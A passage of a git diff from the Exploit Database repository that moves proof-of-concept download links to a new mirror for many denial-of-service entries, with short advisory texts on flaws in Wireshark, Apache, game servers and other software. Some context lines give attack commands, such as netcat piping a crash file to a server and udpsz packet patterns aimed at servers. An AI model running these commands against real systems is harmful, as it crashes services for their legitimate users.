https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/16261.zip \ No newline at end of file diff --git a/exploits/multiple/dos/1709.txt b/exploits/multiple/dos/1709.txt index 4fcc34ac2..926cd0025 100644 --- a/exploits/multiple/dos/1709.txt +++ b/exploits/multiple/dos/1709.txt @@ -18,4 +18,4 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file +Backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/17201.php b/exploits/multiple/dos/17201.php index 74224de4d..521385d0b 100644 --- a/exploits/multiple/dos/17201.php +++ b/exploits/multiple/dos/17201.php @@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar'); ?> -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file diff --git a/exploits/multiple/dos/1801.txt b/exploits/multiple/dos/1801.txt index 81f70b5be..0286a64f5 100644 --- a/exploits/multiple/dos/1801.txt +++ b/exploits/multiple/dos/1801.txt @@ -1,5 +1,5 @@ # libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1801.zip (05172006-libextho.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1801.zip (05172006-libextho.zip) # milw0rm.com [2006-05-17] \ No newline at end of file diff --git a/exploits/multiple/dos/1820.txt b/exploits/multiple/dos/1820.txt index ebd841336..5741712dd 100644 --- a/exploits/multiple/dos/1820.txt +++ b/exploits/multiple/dos/1820.txt @@ -1,5 +1,5 @@ # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1820.zip (05232006-panza.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1820.zip (05232006-panza.zip) # milw0rm.com [2006-05-23] \ No newline at end of file diff --git a/exploits/multiple/dos/18600.txt b/exploits/multiple/dos/18600.txt index 9875f0034..c947a43b4 100644 --- a/exploits/multiple/dos/18600.txt +++ b/exploits/multiple/dos/18600.txt @@ -104,7 +104,7 @@ bytes. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18600.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18600.zip A] udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff diff --git a/exploits/multiple/dos/18601.txt b/exploits/multiple/dos/18601.txt index 6f23a8001..ef54f5638 100644 --- a/exploits/multiple/dos/18601.txt +++ b/exploits/multiple/dos/18601.txt @@ -101,7 +101,7 @@ again. http://aluigi.org/poc/nsrexecd_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18601.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18601.dat nc SERVER PORT < nsrexecd_1.dat diff --git a/exploits/multiple/dos/18758.txt b/exploits/multiple/dos/18758.txt index 9ca2d05be..a14cec9bc 100644 --- a/exploits/multiple/dos/18758.txt +++ b/exploits/multiple/dos/18758.txt @@ -9,4 +9,4 @@ The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18758.pcap \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18758.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18877.txt b/exploits/multiple/dos/18877.txt index 2488f016f..86617ad34 100644 --- a/exploits/multiple/dos/18877.txt +++ b/exploits/multiple/dos/18877.txt @@ -94,7 +94,7 @@ INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \ http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18877.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18877.zip udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000 diff --git a/exploits/multiple/dos/18890.txt b/exploits/multiple/dos/18890.txt index 945b5c490..1e453ee99 100644 --- a/exploits/multiple/dos/18890.txt +++ b/exploits/multiple/dos/18890.txt @@ -8,8 +8,8 @@ some PoC codes which are now available online: http://www.agarri.fr/docs/batik-evil.svg http://www.agarri.fr/docs/batik-evil.jar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18890.svg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18890.jar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18890.svg +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18890.jar I published a more detailed article on my blog: http://www.agarri.fr/blog/ diff --git a/exploits/multiple/dos/18918.txt b/exploits/multiple/dos/18918.txt index d4fffba2a..11cf5563e 100644 --- a/exploits/multiple/dos/18918.txt +++ b/exploits/multiple/dos/18918.txt @@ -7,4 +7,4 @@ Successful exploits may allow attacker to crash the affected application, denyin Wireshark 1.4.0 to 1.4.12 and 1.6.0 to 1.6.7 are vulnerable. PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18918.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18918.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18919.txt b/exploits/multiple/dos/18919.txt index ce654526e..68976b75e 100644 --- a/exploits/multiple/dos/18919.txt +++ b/exploits/multiple/dos/18919.txt @@ -7,11 +7,11 @@ An attacker can exploit these issues to crash the affected application, denying Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-1.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-2.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-3.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-4.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-5.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-6.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-7.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-8.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-1.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-2.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-3.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-4.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-5.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-6.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-7.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18919-8.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18920.txt b/exploits/multiple/dos/18920.txt index 5c2d5b8f4..ac32c0031 100644 --- a/exploits/multiple/dos/18920.txt +++ b/exploits/multiple/dos/18920.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to crash the affected application, denying se Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18920.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18920.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/19380.txt b/exploits/multiple/dos/19380.txt index f85583331..b08d2f31c 100644 --- a/exploits/multiple/dos/19380.txt +++ b/exploits/multiple/dos/19380.txt @@ -9,4 +9,4 @@ Where glob1 is 3000 characters. Marc Maiffret <marc@eeye.com> has released the following exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19380.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19380.zip \ No newline at end of file diff --git a/exploits/multiple/dos/19482.txt b/exploits/multiple/dos/19482.txt index 50628370c..7a941e9b0 100644 --- a/exploits/multiple/dos/19482.txt +++ b/exploits/multiple/dos/19482.txt @@ -17,7 +17,7 @@ http://www.reactionpenetrationtesting.co.uk/FIT-file-handling-DoS.html PoC file is available here: http://www.reactionpenetrationtesting.co.uk/vuln.fit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19482.fit +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19482.fit Affected Products diff --git a/exploits/multiple/dos/19780.txt b/exploits/multiple/dos/19780.txt index a03597486..18745adfb 100644 --- a/exploits/multiple/dos/19780.txt +++ b/exploits/multiple/dos/19780.txt @@ -26,9 +26,9 @@ cgiRqCfg.exe provides to the client configuration settings which will disable sc cgiOnStart.exe will need to be put on the attacking webserver as the client expects it. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19780-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-2.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19780-2.exe this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response. @@ -46,4 +46,4 @@ sleep 5 Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <marc.ruef@computec.ch>. This tool is a pre-compiled Windows binary with Visual Basic source. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-3.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19780-3.zip \ No newline at end of file diff --git a/exploits/multiple/dos/20052.txt b/exploits/multiple/dos/20052.txt index c2fd7942e..5cc03d7de 100644 --- a/exploits/multiple/dos/20052.txt +++ b/exploits/multiple/dos/20052.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1421/info If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20052.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20052.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/20098.txt b/exploits/multiple/dos/20098.txt index 6b8760489..16a8ab5ff 100644 --- a/exploits/multiple/dos/20098.txt +++ b/exploits/multiple/dos/20098.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1503/info Netscape Browsers use the Independent JPEG Group's decoder library to process JPEG encoded images. The library functions skip JPEG comments; however, the browser uses a custom function to process these comments and store them in memory. The comment includes a 2-byte "length" field which indicates how long the comment is - this value includes the 2-bytes of the "length" field. To determine the length of the comment string alone (for memory allocation), the function reads the value in the "length" field and subtracts two. The function then allocates the length of the comment + one byte for NULL termination. There is no error checking to ensure the "length" value is valid. This makes it possible to cause an overflow by creating an image with a comment "length" field containing the value 1. The memory allocation call of 0 bytes (1 minus 2 (length field) + 1 (null termination)) will succeed. The calculated comment size variable is declared unsigned, resulting in a large positive value (from 1 minus 2). The comment handling function goes into a loop to read the comment into memory, but since the calculated comment size is enormous this causes the function to read the entire JPEG stream, overwriting the heap. It is theoretically possible to exploit this to execute arbitrary code. The browser, mail and news readers are all vulnerable to this. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20098.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20098.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/20558.txt b/exploits/multiple/dos/20558.txt index 5e1852263..9185352f5 100644 --- a/exploits/multiple/dos/20558.txt +++ b/exploits/multiple/dos/20558.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/2216/info Apache Web Server 1.2 and previous versions are subject to a denial of service. By requesting a malformed GET request composed of an unusually large number of '/' characters, an attacker can cause CPU usage to spike. A restart of the service is required to gain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20558.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20558.zip \ No newline at end of file diff --git a/exploits/multiple/dos/21572.txt b/exploits/multiple/dos/21572.txt index 4cdaa5854..1b47e453d 100644 --- a/exploits/multiple/dos/21572.txt +++ b/exploits/multiple/dos/21572.txt @@ -4,4 +4,4 @@ Half-Life is a popular game distributed and maintained by Valve Software. It inc A denial of service vulnerability has been reported in some versions of the Half-Life server. A remote party may create a large number of new users on a specific server through spoofing the connection conversation. As servers contain a set limit on the maximum number of players, server resources will be exhausted, and legitimate players will not be allowed to join the game. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21572.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21572.zip \ No newline at end of file diff --git a/exploits/multiple/dos/21593.txt b/exploits/multiple/dos/21593.txt index dbf62012b..dcfc63555 100644 --- a/exploits/multiple/dos/21593.txt +++ b/exploits/multiple/dos/21593.txt @@ -4,4 +4,4 @@ Unreal Tournament is a game produced by Epic Games, available for Microsoft Wind It is possible to use an Unreal Tournament server as an amplifyer in a flooding attack, by transmiting multiple UDP packets with a spoofed victim IP address. The server will make repeated attempts to initiate a connection with the specified address, consuming network resources. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21593.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21593.tgz \ No newline at end of file diff --git a/exploits/multiple/dos/23231.txt b/exploits/multiple/dos/23231.txt index 7b0ba1b77..f103673af 100644 --- a/exploits/multiple/dos/23231.txt +++ b/exploits/multiple/dos/23231.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue may allow an attacker to cause the softwar Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23231.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23231.zip \ No newline at end of file diff --git a/exploits/multiple/dos/23556.txt b/exploits/multiple/dos/23556.txt index 08d707fef..862ce999e 100644 --- a/exploits/multiple/dos/23556.txt +++ b/exploits/multiple/dos/23556.txt @@ -4,4 +4,4 @@ The GetWare Web Server component has been reported prone to a remote denial of s A remote attacker may exploit this issue to deny service to the GetWare Web Server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23556.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23556.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23641.txt b/exploits/multiple/dos/23641.txt index 98f58f61f..1729b4347 100644 --- a/exploits/multiple/dos/23641.txt +++ b/exploits/multiple/dos/23641.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23641.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23641.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23642.txt b/exploits/multiple/dos/23642.txt index 863dd1512..3132e36fa 100644 --- a/exploits/multiple/dos/23642.txt +++ b/exploits/multiple/dos/23642.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23642.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23642.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23755.txt b/exploits/multiple/dos/23755.txt index 5fa84faf0..ad8b11d67 100644 --- a/exploits/multiple/dos/23755.txt +++ b/exploits/multiple/dos/23755.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9738/info The Ghost Recon Game Engine has been reported prone to a denial of service vulnerability. When handling text strings, the Ghost Recon Game Engine employs a 32-bit integer string size prefix in order to monitor the size of the string. It has been reported that when an invalid size value is supplied an exception will be triggered causing a system wide denial of service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23755.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23755.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23805.txt b/exploits/multiple/dos/23805.txt index f6c266443..e78ae70da 100644 --- a/exploits/multiple/dos/23805.txt +++ b/exploits/multiple/dos/23805.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/9849/info The Battle Mages game server has been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when the server receives incomplete client data. Specifically the affected server will attempt to read the expected data size infinitely until it is received, this may allow a remote attacker to tie up server resources and effectively deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23805-1.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23805-1.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23805-2.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23805-2.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23902.txt b/exploits/multiple/dos/23902.txt index 76a0f7ab0..7336d0bed 100644 --- a/exploits/multiple/dos/23902.txt +++ b/exploits/multiple/dos/23902.txt @@ -4,4 +4,4 @@ Roger Wilco Server has been reported prone to a remote denial of service vulnera A remote attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23902.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23902.zip \ No newline at end of file diff --git a/exploits/multiple/dos/23904.txt b/exploits/multiple/dos/23904.txt index d5a90ecae..eecf3eca1 100644 --- a/exploits/multiple/dos/23904.txt +++ b/exploits/multiple/dos/23904.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/10025/info A vulnerability has been reported in the Roger Wilco Server, it is reported that a user does not need to connect to the server over the TCP port to have UDP based audio streams handled. Rather the attacker will require knowledge of user ID's connected to a target channel. Because the user ID's for a channel exist in a range of 0-127, the attacker may transmit an audio stream to an affected server that will be heard by all connected users, however the server administrator will have no control over disconnecting or muting this audio stream. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23904.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23904.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24170.txt b/exploits/multiple/dos/24170.txt index 8ae2aa80c..2718418ab 100644 --- a/exploits/multiple/dos/24170.txt +++ b/exploits/multiple/dos/24170.txt @@ -6,4 +6,4 @@ When entering the multiplayer menu, the game client sends a broadcast message re An attacker running a malicious server process could block all multiplayer access in a local network, denying service to all legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24170.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24170.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24486.txt b/exploits/multiple/dos/24486.txt index b13ae9bc5..197e36ad8 100644 --- a/exploits/multiple/dos/24486.txt +++ b/exploits/multiple/dos/24486.txt @@ -44,4 +44,4 @@ can be performed on any HTTP Authentication portal. RECOMMENDATIONS Reference how Firefox and Safari handle the attached code. -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24486.tar.gz \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24486.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/24668.txt b/exploits/multiple/dos/24668.txt index 398fbf23d..3371521ad 100644 --- a/exploits/multiple/dos/24668.txt +++ b/exploits/multiple/dos/24668.txt @@ -4,4 +4,4 @@ Flash Messaging server is reported prone to a remote denial of service vulnerabi Flash Messaging server 5.2.0g and prior versions are reported prone to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24668.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24668.tar \ No newline at end of file diff --git a/exploits/multiple/dos/24691.txt b/exploits/multiple/dos/24691.txt index 07953918a..333bed030 100644 --- a/exploits/multiple/dos/24691.txt +++ b/exploits/multiple/dos/24691.txt @@ -6,4 +6,4 @@ It is reported that, when handled, a sufficiently malformed audio stream will ca An attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24691.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24691.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24761.txt b/exploits/multiple/dos/24761.txt index 4a45ce433..f6bdcb001 100644 --- a/exploits/multiple/dos/24761.txt +++ b/exploits/multiple/dos/24761.txt @@ -4,4 +4,4 @@ The Halo game client is reported prone to a remote denial of service vulnerabili A remote attacker may exploit this vulnerability to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24761.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24761.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24793.txt b/exploits/multiple/dos/24793.txt index 8b04348df..845e49827 100644 --- a/exploits/multiple/dos/24793.txt +++ b/exploits/multiple/dos/24793.txt @@ -8,4 +8,4 @@ The first issue presents itself when malformed HTTP requests are made to the aff An attacker may leverage these issues to cause the affected proxy server to hang, effectively denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24793.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24793.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24807.txt b/exploits/multiple/dos/24807.txt index 9ac683d56..69ebba161 100644 --- a/exploits/multiple/dos/24807.txt +++ b/exploits/multiple/dos/24807.txt @@ -10,4 +10,4 @@ At this time, preimage attacks are not reportedly possible. It is recommended that cryptosystems that utilize the MD5 algorithm should be reviewed, and the measures should be taken to protect against this weakness. Other hashing algorithms may possibly be utilized in replacement to, or in conjunction with MD5 to decrease the likelihood of a successful attack. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24807.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24807.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/24818.txt b/exploits/multiple/dos/24818.txt index 97e042883..cdc8dde13 100644 --- a/exploits/multiple/dos/24818.txt +++ b/exploits/multiple/dos/24818.txt @@ -4,4 +4,4 @@ A remote denial of service vulnerability reportedly affects Digital Illusions CE An attacker may leverage this issue to cause the affected application to stop responding to network-based messages, effectively denying service to legitimate, remote users. Due to the nature of the network protocol used by the affected application an attacker may spoof their network identity, facilitating anonymous exploitation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24818.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24818.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25081.txt b/exploits/multiple/dos/25081.txt index db049fd95..c484de1e5 100644 --- a/exploits/multiple/dos/25081.txt +++ b/exploits/multiple/dos/25081.txt @@ -4,4 +4,4 @@ LANChat Pro Revival is reported prone to a remote denial of service vulnerabilit A remote attacker may exploit this vulnerability to crash the affected application effectively denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25081.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25081.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25171.txt b/exploits/multiple/dos/25171.txt index 9eea44eae..1c55cac6b 100644 --- a/exploits/multiple/dos/25171.txt +++ b/exploits/multiple/dos/25171.txt @@ -6,4 +6,4 @@ It is reported that the game server crashes when handling various errors. Scrapland 1.0 and prior versions are affected by these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25171.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25171.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25387.txt b/exploits/multiple/dos/25387.txt index c8226f300..edf35a261 100644 --- a/exploits/multiple/dos/25387.txt +++ b/exploits/multiple/dos/25387.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25387.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25388.txt b/exploits/multiple/dos/25388.txt index 665ca8687..3a523fb6a 100644 --- a/exploits/multiple/dos/25388.txt +++ b/exploits/multiple/dos/25388.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25388.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25389.txt b/exploits/multiple/dos/25389.txt index 180c3f499..b2bc84e9a 100644 --- a/exploits/multiple/dos/25389.txt +++ b/exploits/multiple/dos/25389.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25389.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25584.txt b/exploits/multiple/dos/25584.txt index 4b08999b3..a2782c6aa 100644 --- a/exploits/multiple/dos/25584.txt +++ b/exploits/multiple/dos/25584.txt @@ -4,4 +4,4 @@ The Mtp-Target server is prone to a memory corruption vulnerability. The issue e Immediate consequences of exploitation of this vulnerability are a denial of service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25584.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25584.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25692.txt b/exploits/multiple/dos/25692.txt index 60c1a44cb..42e663b02 100644 --- a/exploits/multiple/dos/25692.txt +++ b/exploits/multiple/dos/25692.txt @@ -4,4 +4,4 @@ Warrior Kings: Battles is susceptible to a remote denial of service vulnerabilit This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25692.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25692.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25757.txt b/exploits/multiple/dos/25757.txt index 1b2b9b0be..e5e330240 100644 --- a/exploits/multiple/dos/25757.txt +++ b/exploits/multiple/dos/25757.txt @@ -6,4 +6,4 @@ The issue arises when the game server handles a specially crafted packet. Stronghold 2 1.2 and prior versions are affected by this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25757.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25757.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25791.txt b/exploits/multiple/dos/25791.txt index b501033a9..d4885e93b 100644 --- a/exploits/multiple/dos/25791.txt +++ b/exploits/multiple/dos/25791.txt @@ -6,4 +6,4 @@ Reportedly, the vulnerability presents itself when the library handles an 